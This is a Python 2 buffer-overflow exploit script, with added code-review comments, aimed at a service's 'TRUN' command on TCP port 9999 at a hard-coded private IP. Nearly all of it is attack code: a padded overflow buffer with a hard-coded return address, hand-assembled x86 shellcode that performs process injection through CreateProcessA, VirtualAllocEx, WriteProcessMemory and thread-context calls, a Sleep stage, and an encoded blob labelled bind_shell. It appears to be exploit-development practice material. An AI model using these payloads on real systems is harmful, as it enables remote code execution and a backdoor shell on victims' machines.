#!/usr/bin/python
# Proof-of-concept overflow client for a service listening on TCP port 9999
# (its "TRUN" command); the target host is hard-coded on the connect line.
#
# NOTE(review): this is Python 2 code. Every literal below is a byte string
# only under Python 2; under Python 3 the "\x.." escapes above 0x7F become
# Unicode code points and socket.send() rejects a str with TypeError, which
# the bare except at the bottom would then mis-report as a connection error.
# NOTE(review): as pasted, the connect and send lines use typographic quotes
# (‘ ’), which are not valid Python string delimiters, so this file fails at
# parse time; this looks like a copy/paste artifact rather than intent.
# Code lines are left byte-identical here; only comments were added.
import socket
import sys
# First stage: hand-assembled 32-bit x86 instruction bytes. The trailing
# comment on each line is the author's own disassembly of that line.
# NOTE(review): the kernel32 entry points named in the comments below
# (CreateProcessA, VirtualAllocEx, WriteProcessMemory, Get/SetThreadContext,
# ResumeThread, ExitProcess) are reached through absolute, hard-coded
# addresses -- there is no runtime address resolution anywhere in this
# script -- so the payload is tied to one specific DLL build and address
# layout, and any change to that layout (e.g. ASLR) would be expected to
# break it. From a defender's side, the observable behaviour is a remote
# process spawn followed by cross-process memory writes.
payload="\xBA\x73\x7D\x74\x10" #MOV EDX,10747d73
payload+="\x81\xEA\x10\x10\x10\x10" #SUB EDX,10101010
payload+="\x52" #PUSH EDX
payload+="\x8B\xDC" #MOV EBX,ESP
payload+="\x33\xC9"#XOR ECX,ECX
payload+="\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51" #PUSH ECX
payload+="\x8B\xF4"#MOV ESI,ESP
payload+="\x8B\xFE"#MOV EDI,ESI
payload+="\x83\xC7\x04" #MOV ADD EDI,4
payload+="\x57" #PUSH EDI
payload+="\x56" #PUSH ESI
payload+="\x51\x51" #push ecx
payload+="\xB9\x05\x01\x01\x09" #mov ecx,9010105
payload+="\x81\xE9\x01\x01\x01\x01" #sub ecx,1010101
payload+="\x51" #PUSH ecx
payload+="\x33\xC9" #XOR ECX,ECX
payload+="\x51" #PUSH ecx
payload+="\x51" #PUSH ecx
payload+="\x51" #PUSH ecx
#payload+="\x51" #PUSH ecx
payload+="\x53" #PUSH ebx
payload+="\x51" #PUSH ecx
payload+="\xBB\x82\x20\xDE\x77" #MOV EBX,CreateProcessA
payload+="\xff\xd3" #Call EBX
payload+="\x5E" #pop esi
payload+="\x5E" #pop esi store
payload+="\x5f" #pop edi
payload+="\x6A\x40" #PUSH 40 flprotect PAGE_EXECUTE_READWRITE
payload+="\x33\xC9" #XOR ECX,ECX
payload+="\xb5\x30" #MOV CH,30
payload+="\x51" #PUSH ECX flAllocationType
payload+="\xb5\x01" #MOV CH,01
payload+="\xb1\xf4" #MOV CL,0F4
payload+="\x51" #PUSH ECX
payload+="\x33\xC9" #XOR ECX,ECX
payload+="\x51" #PUSH ECX
payload+="\x56" #PUSH ESI
payload+="\xBB\xB6\xc1\xe1\x77"#MOV EBX,kernel32.VirtualallocEx
payload+="\xff\xd3" #Call EBX
payload+="\x8B\xE8" #MOV EBP,EAX
payload+="\x33\xdb" #XOR EBX,EBX
payload+="\x53"#PUSH EBX
payload+="\xb7\x01"#MOV BH,1
payload+="\xb3\xf4"#MOV bl,0f4
payload+="\x53" #PUSH EBX
payload+="\x8b\xdc"#mov EBX,ESP
payload+="\x66\x81\xC3\x74\x02" #ADD BX,274
payload+="\x53" #PUSH EBX
payload+="\x50" #PUSH EAX
payload+="\x56" #PUSH ESI
payload+="\xBB\xde\xC1\xe1\x77" #MOV EBX,kernel32.writeProcessMEMORY
payload+="\xff\xd3" #Call EBX
payload+="\x8b\xdc"#MOV EBX,ESP
payload+="\x66\x81\xEB\x50\x01" #SUB BX,150
payload+="\x33\xc9" #XOR ECX,ECX
payload+="\x66\xB9\xff\xff"#MOV CX,0xffff
payload+="\x41" #inc ecx
payload+="\x41" #inc ecx
payload+="\x89\x0B"#MOV DWORD[EBX],ECX
payload+="\x53"#PUSH ECX
payload+="\x57"#PUSH EDI
payload+="\xB9\xC1\x0C\xE4\x77"#MOV ECX,kernel32.GetThreadContext
payload+="\xff\xd1" #Call ECX
payload+="\x8b\xcb"#MOV ECX,EbX
payload+="\x80\xc1\xb8" #ADD CL,0xb8
payload+="\x80\xc5\x01" #ADD CH,0x1
payload+="\x89\x29" #MOV DWORD [ECX],EBP
payload+="\x53" #PUSH EDX
payload+="\x57" #PUSH EDI
payload+="\xbb\x93\x01\xe7\x77" #mov ebx,kernel32.SetThreadContext
payload+="\xff\xd3" #Call EBX
payload+="\x57" #PUSH EDI
payload+="\xbb\x1c\x0f\xe2\x77"#MOV EBX,kernel32.ResumeThread
payload+="\xff\xd3" #Call EBX
payload+="\x33\xc9" #XOR ECX,ECX
payload+="\x51" #PUSH ECX
payload+="\xBB\x4f\x21\xe3\x77" #mov ebx,kernel32.ExitProcess
payload+="\xff\xd3" #Call EBX
# Second stage: per the inline comments, zeroes ECX, sets CL=0x88 and
# CH=0x13 (ECX = 0x1388), pushes it and calls kernel32.Sleep through another
# hard-coded absolute address.
sleep=""
sleep+="\x33\xc9" #XOR ECX,ECX
sleep+="\xB1\x88" #MOV CL,88
sleep+="\xB5\x13" #MOV CH,13
sleep+="\x51" #PUSH ECX
sleep+="\xbb\x46\xba\xe2\x77" #MOV EBX,kernel32.Sleep
sleep+="\xff\xd3" #Call EBX
# Third stage: an opaque byte blob. Nothing on this page documents its
# contents beyond the variable name; treat it as untrusted binary data.
bind_shell=("\xda\xc2\xd9\x74\x24\xf4\xbd\x90\xac\x38\xd9\x58\x29\xc9\xb1"
    "\x53\x31\x68\x17\x83\xc0\x04\x03\xf8\xbf\xda\x2c\x04\x57\x98"
    "\xcf\xf4\xa8\xfd\x46\x11\x99\x3d\x3c\x52\x8a\x8d\x36\x36\x27"
    "\x65\x1a\xa2\xbc\x0b\xb3\xc5\x75\xa1\xe5\xe8\x86\x9a\xd6\x6b"
    "\x05\xe1\x0a\x4b\x34\x2a\x5f\x8a\x71\x57\x92\xde\x2a\x13\x01"
    "\xce\x5f\x69\x9a\x65\x13\x7f\x9a\x9a\xe4\x7e\x8b\x0d\x7e\xd9"
    "\x0b\xac\x53\x51\x02\xb6\xb0\x5c\xdc\x4d\x02\x2a\xdf\x87\x5a"
    "\xd3\x4c\xe6\x52\x26\x8c\x2f\x54\xd9\xfb\x59\xa6\x64\xfc\x9e"
    "\xd4\xb2\x89\x04\x7e\x30\x29\xe0\x7e\x95\xac\x63\x8c\x52\xba"
    "\x2b\x91\x65\x6f\x40\xad\xee\x8e\x86\x27\xb4\xb4\x02\x63\x6e"
    "\xd4\x13\xc9\xc1\xe9\x43\xb2\xbe\x4f\x08\x5f\xaa\xfd\x53\x08"
    "\x1f\xcc\x6b\xc8\x37\x47\x18\xfa\x98\xf3\xb6\xb6\x51\xda\x41"
    "\xb8\x4b\x9a\xdd\x47\x74\xdb\xf4\x83\x20\x8b\x6e\x25\x49\x40"
    "\x6e\xca\x9c\xfd\x66\x6d\x4f\xe0\x8b\xcd\x3f\xa4\x23\xa6\x55"
    "\x2b\x1c\xd6\x55\xe1\x35\x7f\xa8\x0a\x1e\x8f\x25\xec\x0a\x9f"
    "\x63\xa6\xa2\x5d\x50\x7f\x55\x9d\xb2\xd7\xf1\xd6\xd4\xe0\xfe"
    "\xe6\xf2\x46\x68\x6d\x11\x53\x89\x72\x3c\xf3\xde\xe5\xca\x92"
    "\xad\x94\xcb\xbe\x45\x34\x59\x25\x95\x33\x42\xf2\xc2\x14\xb4"
    "\x0b\x86\x88\xef\xa5\xb4\x50\x69\x8d\x7c\x8f\x4a\x10\x7d\x42"
    "\xf6\x36\x6d\x9a\xf7\x72\xd9\x72\xae\x2c\xb7\x34\x18\x9f\x61"
    "\xef\xf7\x49\xe5\x76\x34\x4a\x73\x77\x11\x3c\x9b\xc6\xcc\x79"
    "\xa4\xe7\x98\x8d\xdd\x15\x39\x71\x34\x9e\x49\x38\x14\xb7\xc1"
    "\xe5\xcd\x85\x8f\x15\x38\xc9\xa9\x95\xc8\xb2\x4d\x85\xb9\xb7"
    "\x0a\x01\x52\xca\x03\xe4\x54\x79\x23\x2d")
# Buffer layout, left to right: 2003 filler bytes; one 4-byte little-endian
# value (the trailing comment spells it out as 625011af); the first-stage
# payload; "C" padding sized so that everything up to here totals
# 2500 - 10 = 2490 bytes (the "-10" is not explained on this page); then a
# 100-byte run of 0x90, the sleep stage, 10 more 0x90 bytes, and bind_shell.
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + payload + "C"*(2500-len(payload)-4-2003-10)+"\x90"*100+sleep+"\x90"*10+bind_shell #625011af
# NOTE(review): the body of this try was pasted without indentation; it is
# indented here for readability only. The whole connect/send/close sequence
# sits under one bare `except:`, so any failure (DNS, refused connection,
# the Python-3 TypeError from send(), even KeyboardInterrupt) is reported
# with the same "Error connecting to server" text; catching socket.error
# and printing the exception would make the failure mode visible. s.close()
# is also skipped on any exception because it is not in a finally/with.
try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # socket.connect() returns None, so `connect` is never meaningfully used.
    connect=s.connect((‘172.16.12.204’,9999))
    s.send((‘TRUN /.:/’+shellcode))
    # NOTE(review): the message is misleading -- a single fixed buffer is sent
    # once, not fuzzed -- and "comamnd" is a typo. It is a runtime string, so
    # it is left unchanged in this documentation pass.
    print("Fuzzing with TRUN comamnd with %s bytes"% str(len(shellcode)))
    s.close()
except:
    print("Error connecting to server")
    sys.exit()